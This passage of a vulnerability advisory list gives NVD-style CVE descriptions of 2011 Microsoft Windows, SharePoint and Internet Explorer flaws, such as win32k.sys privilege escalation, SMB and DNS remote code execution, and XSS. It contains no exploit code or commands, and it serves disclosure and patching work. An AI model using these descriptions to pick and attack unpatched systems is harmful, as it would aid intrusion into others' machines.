memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and 